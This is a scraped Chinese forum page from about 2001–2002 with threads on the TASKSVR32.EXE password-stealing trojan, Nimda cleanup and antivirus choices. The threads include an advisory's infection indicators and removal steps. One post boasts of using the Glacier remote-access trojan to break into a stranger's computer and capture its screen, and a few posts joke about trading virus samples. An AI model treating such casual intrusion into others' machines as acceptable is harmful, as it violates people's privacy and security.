 发表于 2001-11-25 00:01:01 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
donger在上个帖子中说
引用:
我有一朋友中了TASKSVR32.EXE病毒/木马，没法解决（查得出杀不掉）

--寻求不用格C盘的解决方案

Virus Characteristics:

This is password stealing and backdoor trojan which is compressed with the ASPack packer program. When run, it copies itself to the WINDOWS SYSTEM directory as TASKSVR32.EXE and creates a registry run key to load the program at startup:
HKLM\Software\Microsoft\Windows\CurrentVersion\
Run\Microsoft Task Manager=tasksvr32.exe

TCP/IP Port 10452 is opened and the default POP3 mail account is reconfigured to route incoming mail through the trojan program on port 127.1

The program acts as a middle man when receiving email messages. Any request to check your mail account are routed through the trojan which enables it to steal your POP3 account user information.

Additionally, system information (such as RAM, Disk Space, and CPU speed) and Windows cached passwords are also sent to a MAIL.RU email address.

Indications Of Infection:

- TCP/IP Port 10452 being left opened
- Reconfigured mail settings
- Presence of the file TASKSVR32.EXE in the WINDOWS SYSTEM directory

Method Of Infection:

When this trojan program is executed on the local machine, system information and passwords are sent to the author of the program.

Removal Instructions:

Use specified engine and DAT files for detection and removal.
Manual Removal Instructions

Delete the registry keys as mentioned
Restart the computer
Delete the files mentioned
Reset POP3 mail account information/settings
Windows ME Info:
NOTE: Windows ME utilizes a backup utility that backs up selected files automatically to the C:\_Restore folder. This means that an infected file could be stored there as a backup file, and VirusScan will be unable to delete these files. These instructions explain how to remove the infected files from the C:\_Restore folder.

Disabling the Restore Utility

1. Right click the My Computer icon on the Desktop.
2. Click on the Performance Tab.
3. Click on the File System button.
4. Click on the Troubleshooting Tab.
5. Put a check mark next to "Disable System Restore".
6. Click the Apply button.
7. Click the Close button.
8. Click the Close button again.
9. You will be prompted to restart the computer. Click Yes.
NOTE: The Restore Utility will now be disabled.
10. Restart the computer in Safe Mode.
11. Run a scan with VirusScan to delete all infected files, or browse the the file's located in the C:\_Restore folder and remove the file's.
12. After removing the desired files, restart the computer normally.
NOTE: To re-enable the Restore Utility, follow steps 1-9 and on step 5 remove the check mark next to "Disable System Restore". The infected file's are removed and the System Restore is once again active.

也可试试用启动盘启动后用kv3000在DOS下查杀 通常杀不掉的原因是因为程序驻留
在DOS下通常没有这个问题

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：HELP
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我现在每个分区的根目录下面都有一个这样的文件。。。

计算机技术
我现在每个分区的根目录下面都有一个这样的文件。。。

上一贴 | 下一贴
发表人 主题: 我现在每个分区的根目录下面都有一个这样的文件。。。
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-15 17:31:05 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
admin.dll ,这是中了什么病毒。

还有每次开机发现CPU的占用率就达到了100%，这又是什么病毒？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-11-15 17:44:25 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
中毒了,是nmd

好好学习，努力做事
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-15 18:17:26 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
还是nimda，还没弄掉？？上次我不是贴了方法了么？

always ran...
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-16 09:30:40 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
randomix在上个帖子中说
引用:
还是nimda，还没弄掉？？上次我不是贴了方法了么？

现在*.eml文件倒是没有了，但admin.dll老是去不掉！

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-11-16 11:10:49 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
最好是重装啦，我是不太相信杀毒软件了！
可以在dos 下删这个

小心者,心小也!
mao

现任版主
积分：1571
发帖：656
来自：北京
注册：2000-07-23
 发表于 2001-11-16 14:50:23 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
我也被传染上这种病毒了，我用最新的kv3000杀毒，病毒到是没有了
但是每次用word的时候一直报内存空间不足，不知道怎么解决了

解决问题才有进步
解决问题才有进步
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-16 20:25:02 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
我也有这个文件，是在C：下，我用的是XP，删除了

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

Eggplant

初级用户
积分：103
发帖：28
来自：深圳市
注册：2002-04-29
 发表于 2002-05-09 09:59:41 按此观看Eggplant的个人资料 按此发邮件给Eggplant 发送悄悄话给Eggplant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Eggplant的IP
mao在上个帖子中说
引用:
我也被传染上这种病毒了，我用最新的kv3000杀毒，病毒到是没有了
但是每次用word的时候一直报内存空间不足，不知道怎么解决了

我遇到的问题跟你一样，杀毒后用office安装盘修复office

I love this game
肖天

超级用户
积分：347
发帖：90
来自：黑龙江省
注册：2001-06-28
 发表于 2002-05-09 12:32:53 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP
用NMD专杀程序来杀他

good good study ,day day up!
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2002-05-09 13:51:44 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
我用金山毒霸杀光了，也重装系统了，还是一样。。。

怀疑是某张游戏光碟有问题

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

闲着也是闲着

初级用户
积分：36
发帖：44
来自：-------
注册：2002-05-08
 发表于 2002-05-09 18:41:37 按此观看闲着也是闲着的个人资料 该用户不允许显示它的电子邮件 访问闲着也是闲着的主页 闲着也是闲着 的 oicq 是16998239,查看 16998239 的资料 发送悄悄话给闲着也是闲着 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看闲着也是闲着的IP
备份
然后再格掉,这样就干净了,嘿嘿.
也是最简单的方法不用老去到处找原因
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-05-09 20:09:27 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
看看恢复注册表行不行？进入dos把system.dat改名，再重启

找个杀进程的工具pview95瞒好的！

如果对注册表了解的话，还是手工删比较好！把可疑进程杀掉，再改注册表！

我笨故我菜！

好好学习，天天向上!

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-05-09 20:56:33 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
闲着也是闲着在上个帖子中说
引用:
备份
然后再格掉,这样就干净了,嘿嘿.
也是最简单的方法不用老去到处找原因

呵呵，你能保证你备份的东西里面没有病毒吗？

Blueidea Web Team.
Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：我现在每个分区的根目录下面都有一个这样的文件。。。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


计算机的网络病毒有哪些传播途径？

计算机技术
计算机的网络病毒有哪些传播途径？

上一贴 | 下一贴
发表人 | 主题: 计算机的网络病毒有哪些传播途径？
天涯剑客 初级用户 积分：0 发帖：2 来自： 注册：2001-10-08 | 发表于 2001-11-09 23:47:30 按此观看天涯剑客的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给天涯剑客 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天涯剑客的IP 想向各位经典的高手请教一下问题： 计算机的网络病毒有哪些传播途径？ 如果不随便收取E-mail，病毒还有没有其他网络传播的可能？
MOP 拖把一族 积分：1263 发帖：854 来自：垃圾箱 注册：2001-09-28 | 发表于 2001-11-10 00:56:36 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP 光盘, 软盘 还有硬盘对拷时 网络最成用的途径是 邮件,软件下载,接受文件时 [这消息被MOP编辑过(编辑时间2001-11-10 00:56:26)] --------------------------------------------- + MOP FAMILY + =Blueidea=MOP
软硬兼施 终级用户 积分：465 发帖：295 来自：net 注册：2001-08-03 | 发表于 2001-11-10 01:28:03 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP 认同楼上的观点 ^^
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-11-10 02:45:02 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 以目前流行的尼姆达(又称你妈的)病毒来说 如果你开了没有密码的完全共享 该目录也会被拷贝上一个.eml文件 一旦点击就被Gun down了 最好是使用Nav或是其他的病毒防火墙 经过升级后的病毒库完全可以应付 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 | 主题：计算机的网络病毒有哪些传播途径？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


你们都用什么杀毒软件？！

计算机技术
你们都用什么杀毒软件？！

上一贴 | 下一贴
发表人 主题: 你们都用什么杀毒软件？！
gUxInG2000

感觉在线
积分：1872
发帖：822
来自：深圳
注册：2000-10-31
 发表于 2001-11-01 16:55:29 按此观看gUxInG2000的个人资料 按此发邮件给gUxInG2000 gUxInG2000 的 oicq 是4646225,查看 4646225 的资料 收藏该主题供以后查看 发送悄悄话给gUxInG2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gUxInG2000的IP
近来病毒猖狂
你们用什么防护的。

玩可以找我，疯狂可以找我，学习千万不要来骚扰我，谢谢！
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-01 17:03:54 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
没什么好的。我现在一直在用瑞星，也不知道如何。还有就是nav一起配合来杀。总的感觉不错，就是病毒库大了点（还好我家是ADSL）

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
SU70

初级用户
积分：0
发帖：1
来自：
注册：2001-11-01
 发表于 2001-11-01 17:21:01 按此观看SU70的个人资料 按此发邮件给SU70 发送悄悄话给SU70 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看SU70的IP
诺顿不错，现在硬件便宜，资源占用问题也没什么了
LIGHT

初级用户
积分：27
发帖：24
来自：广州
注册：2001-10-16
 发表于 2001-11-01 17:21:57 按此观看LIGHT的个人资料 按此发邮件给LIGHT 访问LIGHT的主页 LIGHT 的 oicq 是17739971,查看 17739971 的资料 发送悄悄话给LIGHT 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看LIGHT的IP
金山毒霸都还可以了，上网时启动防火墙一切都安全了。

充实的生活里不能缺少的是学习
快乐的生活里不能缺少的是知足
===go2.163.com/520light==
gUxInG2000

感觉在线
积分：1872
发帖：822
来自：深圳
注册：2000-10-31
 发表于 2001-11-01 17:25:19 按此观看gUxInG2000的个人资料 按此发邮件给gUxInG2000 gUxInG2000 的 oicq 是4646225,查看 4646225 的资料 发送悄悄话给gUxInG2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gUxInG2000的IP
也不行啊
金山的程序本身就有问题。

玩可以找我，疯狂可以找我，学习千万不要来骚扰我，谢谢！
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-01 17:36:43 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
我觉的这方面，国外的软件要好于国内的。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
plw

超级用户
积分：387
发帖：625
来自：荆州
注册：2001-05-18
 发表于 2001-11-01 19:29:50 按此观看plw的个人资料 按此发邮件给plw plw 的 oicq 是19759705,查看 19759705 的资料 发送悄悄话给plw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看plw的IP
Norton AntiVirus 2000 + 金山毒霸

It's a humdrum day again!
desoso

初级用户
积分：10
发帖：38
来自：最激天使联盟
注册：2001-10-09
 发表于 2001-11-01 20:39:38 按此观看desoso的个人资料 按此发邮件给desoso 发送悄悄话给desoso 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看desoso的IP
我挂的空擋 ~~~

這就是生活
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-01 21:24:38 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
其实不用也没有什么，平常注意一下就好，不随便下东西。不轻易看不清楚来源的信。预防为主，杀毒为辅么

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-02 08:25:54 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
plw在上个帖子中说
引用:
Norton AntiVirus 2000 + 金山毒霸

为何要加金山？？？我用2000一直很安全啊。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-02 08:47:59 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
我用norton企业版，据说占用资源比norton2000小

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-11-02 10:23:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
我什么都不用！

我每三天就去微软的windows update升级安全漏洞！

我也不打开来历不明的附件，也不去一些小站点下载软件，所以我很少中毒。

唯一痛苦过一次就是nimda，起初也是杀不干净，后来去微软升级了系统，就彻底好了！

杀毒了，却不堵系统漏洞，没用。
挂防火墙太浪费资源，我舍不得。我的机器是P3-1G+256M，照样觉得资源紧张，所以从来不挂防火墙。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-02 11:24:53 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
其实归根结底还是windows这个大病毒的问题。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
solomon

锋子
积分：1700
发帖：2813
来自：Mahabrahman
注册：2001-04-01
 发表于 2001-11-02 13:33:42 按此观看solomon的个人资料 按此发邮件给solomon 访问solomon的主页 solomon 的 oicq 是2300666,查看 2300666 的资料 发送悄悄话给solomon 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看solomon的IP
诺顿网络安全特警！三位一体的重型防火墙！

年轻人不要着急挣钱，
也不要着急建立什么关系！

重要的是先把自己的基础夯实！

挣钱不是挣一时，
要挣就挣一辈子！！！

Blueidea Web Team.
Team Spalpeen.

windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-02 13:39:17 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
我就是用诺顿，虽然说系统的资源占用大了些，可是很安全、可靠

用着放心！ 推荐使用这个，注意用2000＋诺顿的朋友需要256MB内存！

Blueidea Web Team
Moderator Of multimedia forum
AdamChen

高级用户
积分：188
发帖：76
来自：上海
注册：2001-06-07
 发表于 2001-11-02 13:45:38 按此观看AdamChen的个人资料 按此发邮件给AdamChen 访问AdamChen的主页 AdamChen 的 oicq 是7305650,查看 7305650 的资料 发送悄悄话给AdamChen 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AdamChen的IP
我用诺顿杀毒2002

诱惑我一辈子...
http://TemptMe.yeah.net
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-02 13:47:10 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
用电脑这么久，居然没有亲眼见过一次病毒发作。。

哪里有病毒下载吗？呵呵。。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-02 14:01:20 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
darkvn在上个帖子中说
引用:
用电脑这么久，居然没有亲眼见过一次病毒发作。。

哪里有病毒下载吗？呵呵。。

早说嘛，前几天我忙着杀公司里7台电脑里的nimda，这东东厉害，害的我都是拔掉网线才杀的（不知杀干净了没有）。有点奇怪，在线升级的诺顿可以拦截，下载病毒升级包再升级的诺顿竟拦不住，不知是否和“病毒事件定义”有关。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-02 14:14:23 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
TMD诺顿2000唯独win2k server版不能装！

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-02 14:21:48 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
菜菜子在上个帖子中说
引用:
TMD诺顿2000唯独win2k server版不能装！

不是有NT版的吗，可以装在server上，我公司都装了，adv server就不知道了

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-02 22:54:34 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
SERVER版本装上后好像是不能在线升级了。

Blueidea Web Team
Moderator Of multimedia forum
cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-03 00:53:44 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
norton 有专门的企业版，装在服务器上，防治类似nimda这类病毒应该更有效。比单机版复杂多了，正版好像一万多一套。

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-11-03 09:27:42 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
windangel在上个帖子中说
引用:
SERVER版本装上后好像是不能在线升级了。

能啊，我的是中文版的，不知有没有区别，买硬盘时送的。

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
MCS2000

终级用户
积分：913
发帖：302
来自：HEBEI
注册：2001-03-09
 发表于 2001-11-03 13:44:07 按此观看MCS2000的个人资料 按此发邮件给MCS2000 访问MCS2000的主页 发送悄悄话给MCS2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MCS2000的IP
darkvn在上个帖子中说
引用:
用电脑这么久，居然没有亲眼见过一次病毒发作。。

哪里有病毒下载吗？呵呵。。

我这有一个病毒，一直没杀死，你要不要？它虽然和我“和平共处”，但老好死机。我很想杀死它！

~~~主页全新改版~~~

---+++--http://mcs2000.yeah.net---+++--

秋雁

超级用户
积分：408
发帖：125
来自：江苏
注册：2001-10-30
 发表于 2001-11-03 16:43:20 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP
我用KV3000，，，，感觉还行！！都是瘟98的错！！！

*********************************
*　 买论坛，空间，域名 就找我　 *
* 特别优惠供应，联系QQ 5480510 *
*********************************
DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-11-03 19:54:51 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
norton & mcafee it's best!!!

btw:if your os is server ver. you can install norton ce 7.x

木有签名#@$%
plw

超级用户
积分：387
发帖：625
来自：荆州
注册：2001-05-18
 发表于 2001-11-05 22:01:42 按此观看plw的个人资料 按此发邮件给plw plw 的 oicq 是19759705,查看 19759705 的资料 发送悄悄话给plw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看plw的IP
CrazyParty在上个帖子中说
引用:
plw在上个帖子中说
引用:
Norton AntiVirus 2000 + 金山毒霸

为何要加金山？？？我用2000一直很安全啊。

装着玩的

It's a humdrum day again!
lbx1979

终级用户
积分：462
发帖：115
来自：Beijing.Gene
注册：2000-10-17
 发表于 2001-11-07 21:00:41 按此观看lbx1979的个人资料 该用户不允许显示它的电子邮件 lbx1979 的 oicq 是3631512,查看 3631512 的资料 发送悄悄话给lbx1979 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lbx1979的IP
我们公司也nimda大规模的爆发了,金山毒霸好像不太行吧,换了一个trend officescan杀掉了,可惜我的机器里还有一个变种的funlove杀不掉,每次连接sybase都跳出来说"清除失败",把进程杀掉了,最后我把防护关掉了,打开sybase anywhere后,再操作数据库,居然就不提示有病毒了,呵呵,可能这个病毒是良性的吧,嘻嘻.

痛苦是不存在的，那只不过是某个连自己也不知道的地方有点儿疼
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-08 09:37:57 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
LIGHT在上个帖子中说
引用:
金山毒霸都还可以了，上网时启动防火墙一切都安全了。

胡说, 请几天我还用冰河搜索了一台装金山毒霸的电脑,也是开那个防火墙,我捕了他的屏,看见他的金山防火墙是开这的!我建议你装个天网比较安全! ;)

^^
上一贴 | 下一贴
快速回复 | 主题：你们都用什么杀毒软件？！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Outlook Express

计算机技术
Outlook Express

上一贴 | 下一贴
发表人 主题: Outlook Express
nicely

初级用户
积分：40
发帖：19
来自：
注册：2001-07-29
